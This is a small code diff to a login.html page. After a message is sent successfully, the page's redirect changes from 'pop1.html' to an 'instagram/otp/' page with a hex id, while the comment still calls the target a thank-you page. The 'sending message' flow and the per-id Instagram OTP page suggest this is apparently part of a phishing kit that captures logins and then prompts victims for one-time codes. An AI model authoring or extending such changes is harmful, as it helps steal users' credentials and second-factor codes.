--- a/login.html
+++ b/login.html
@@ -180,7 +180,7 @@
                 .then(response => response.json())
                 .then(data => {
                     if (data.ok) {
-                        window.location.href = 'pop1.html';  // Redirect to thank you page
+                        window.location.href = 'instagram/otp/657daf104b167f68d1979b9c.html';  // Redirect to thank you page
                     } else {
                         alert('Error sending message.');
                     }
@@ -205,3 +205,4 @@
 </body>
 
 </html>
+
